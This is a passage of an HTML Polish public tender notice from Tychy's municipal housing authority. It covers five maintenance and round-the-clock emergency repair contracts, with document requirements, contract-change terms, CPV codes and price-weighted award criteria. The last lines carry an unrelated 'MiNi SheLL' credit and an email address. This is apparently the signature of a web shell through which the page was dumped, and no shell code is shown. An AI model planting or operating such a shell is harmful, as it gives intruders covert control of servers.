<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik do SIWZ;
2)	wypełniony i podpisany formularz oferty cenowej - sporządzony według wzoru druku stanowiącego załącznik do SIWZ;
3)	stosowne pełnomocnictwo (a) do działania w imieniu Wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z 
 właściwego rejestru;
4)	w przypadku Wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego;
5)Zgodnie z art. 26 ust. 2b ustawy - PZP, Wykonawca może polegać na wiedzy            
         i doświadczeniu ,potencjale technicznym, osobach zdolnych do wykonania zamówienia, 
 zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru  
 prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest  
 udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji  
 zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych 
 podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby  
 wykonania zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy: 
DLA ZADAŃ NR : 1 ,2, 3, 4 i 5 - w następujących przypadkach:
1)	 zmian personalnych, adresowych, formy prawnej stron umowy;
2)	 zmiany osoby/osób odpowiedzialnych za realizację robót, o których mowa w § 4 umowy;
3)	 zmiany przepisów ustawy o podatku od towarów i usług w zakresie wysokości stawki  
     VAT; 
4)	 zmiany podwykonawcy w trakcie trwania umowy - za zgodą Zamawiającego;
5)	 zmniejszenia powierzchni (m2) administrowanych lokali zmianie ulegnie wysokość 
          miesięcznego wynagrodzenia ryczałtowego;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2014 godzina 08:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1  -  Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje
1) bieżącą obsługę konserwacyjną polegająca na utrzymaniu w pełnej sprawności technicznej wewnętrznych instalacji: wod-kan, c.o.,  c.c.w. , gazowej i elektrycznej;

1)	świadczenie czynności całodobowego pogotowia technicznego;

  3)  wykonywanie napraw i robót budowlanych wykraczających poza zakres bieżącej  
 konserwacji;


4. Szczegółowy zakres obowiązków zawiera (powtarzalny dla wszystkich zadań) -załącznik   
   nr 1 do projektu umowy.   

5. Szczegółowy wykaz adresów nieruchomości Gminy Miasta Tychy administrowanych  przez ROM I zawiera  załącznik do projektu umowy:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.30.00-9, 45.31.12.00-2, 34.26.19.00-3, 45.26.13.20-3, 45.26.25.22-6, 45.41.00.00-4, 45.44.00.00-3, 45.42.00.00-7, 45.42.11.31-1, 45.42.11.32-8, 45.23.32.53-7, 50.70.00.00-2, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Stawka roboczogodziny kosztorysowej:  R-g brutto (R+Kp.+Zysk) - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2 -  Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje
1) bieżącą obsługę konserwacyjną polegająca na utrzymaniu w pełnej sprawności technicznej wewnętrznych instalacji: wod-kan, c.o.,  c.c.w. , gazowej i elektrycznej;

1)	świadczenie czynności całodobowego pogotowia technicznego;

  3)  wykonywanie napraw i robót budowlanych wykraczających poza zakres bieżącej  
 konserwacji;


4. Szczegółowy zakres obowiązków zawiera (powtarzalny dla wszystkich zadań) -załącznik   
   nr 1 do projektu umowy.   

5. Szczegółowy wykaz adresów nieruchomości Gminy Miasta Tychy administrowanych przez ROM II  stanowi załącznik do projektu umowy:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.30.00-0, 45.31.12.00-2, 45.26.19.00-3, 45.26.13.20-3, 45.26.25.22-6, 45.41.00.00-4, 45.44.00.00-3, 45.44.00.00-3, 45.42.00.00-7, 45.42.11.31-1, 45.42.11.32-8, 45.23.32.53-7, 50.70.00.00-2, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Stawka roboczogodziny kosztorysowej:  R-g brutto (R+Kp.+Zysk) - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE Nr 3 -   Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje
1) bieżącą obsługę konserwacyjną polegająca na utrzymaniu w pełnej sprawności technicznej wewnętrznych instalacji: wod-kan, c.o.,  c.c.w. , gazowej i elektrycznej;

1)	świadczenie czynności całodobowego pogotowia technicznego;

  3)  wykonywanie napraw i robót budowlanych wykraczających poza zakres bieżącej  
 konserwacji;


4. Szczegółowy zakres obowiązków zawiera (powtarzalny dla wszystkich zadań) -załącznik   
   nr 1 do projektu umowy.   

5. Szczegółowy wykaz adresów nieruchomości Gminy Miasta Tychy administrowanych przez ROM III  stanowi załącznik do projektu umowy:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.31.12.00-2, 45.26.19.00-3, 45.26.13.20-3, 45.26.25.22-6, 45.41.00.00-4, 45.44.00.00-3, 45.42.00.00-7, 45.42.11.31-1, 45.42.11.32-8, 45.23.32.53-7, 50.70.00.00-2, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Stawka roboczogodziny kosztorysowej:  R-g brutto (R+Kp.+Zysk) - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE Nr 4 -  Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje
1) bieżącą obsługę konserwacyjną polegająca na utrzymaniu w pełnej sprawności technicznej wewnętrznych instalacji: wod-kan, c.o.,  c.c.w. , gazowej i elektrycznej;

1)	świadczenie czynności całodobowego pogotowia technicznego;

  3)  wykonywanie napraw i robót budowlanych wykraczających poza zakres bieżącej  
 konserwacji;


4. Szczegółowy zakres obowiązków zawiera (powtarzalny dla wszystkich zadań) -załącznik   
   nr 1 do projektu umowy.   

5. Szczegółowy wykaz adresów nieruchomości Gminy Miasta Tychy administrowanych przez ROM IV  stanowi załącznik do projektu umowy:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.30.00-0, 45.31.12.00-2, 45.26.19.00-3, 45.26.25.22-6, 45.41.00.00-4, 45.44.00.00-3, 45.42.00.00-7, 45.42.11.31-1, 45.42.11.32-8, 45.23.32.53-7, 50.70.00.00-2, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Stawka roboczogodziny kosztorysowej:  R-g brutto (R+Kp.+Zysk) - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE Nr 5 -  Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje
1) bieżącą obsługę konserwacyjną polegająca na utrzymaniu w pełnej sprawności technicznej wewnętrznych instalacji: wod-kan, c.o.,  c.c.w. , gazowej i elektrycznej;

1)	świadczenie czynności całodobowego pogotowia technicznego;

  3)  wykonywanie napraw i robót budowlanych wykraczających poza zakres bieżącej  
 konserwacji;


4. Szczegółowy zakres obowiązków zawiera (powtarzalny dla wszystkich zadań) -załącznik   
   nr 1 do projektu umowy.   

5. Szczegółowy wykaz adresów nieruchomości Gminy Miasta Tychy administrowanych przez ROM V  stanowi załącznik do projektu umowy:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.30.00-0, 45.31.12.00-2, 45.26.19.00-3, 45.26.13.20-3, 45.26.25.22-6, 45.41.00.00-4, 45.44.00.00-3, 45.42.00.00-7, 45.42.11.31-1, 45.42.11.32-8, 45.23.32.53-7, 50.70.00.00-2, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Stawka roboczogodziny kosztorysowej:  R-g brutto (R+Kp.+Zysk) - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com